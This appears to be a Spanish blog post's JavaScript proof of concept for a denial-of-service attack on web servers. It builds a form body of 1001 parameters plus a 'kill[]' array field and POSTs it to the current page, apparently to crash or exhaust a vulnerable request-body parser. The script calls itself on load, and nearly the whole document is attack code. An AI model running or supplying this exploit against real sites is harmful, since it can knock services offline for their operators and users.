// Prueba de concepto
function createEvilObj () {
var evil_obj = {};
for (var i = 0; i < 1001; i++) {
evil_obj[i] = 1;
}
evil_obj['kill[]'] = 'kill';
return evil_obj;
}
// Serialize Javascript object into POST data
function serializeObj (obj) {
var str = [];
for(var p in obj) {
str.push(p + "=" + obj[p]);
}
return str.join("&");
}
// Run attack
function attackSite () {
var bad = serializeObj(createEvilObj());
var xhr = new XMLHttpRequest();
xhr.open("POST", location.href, true);
xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xhr.setRequestHeader('Content-Length', bad.length);
xhr.send(bad);
}
attackSite();
Comentarios
Publicar un comentario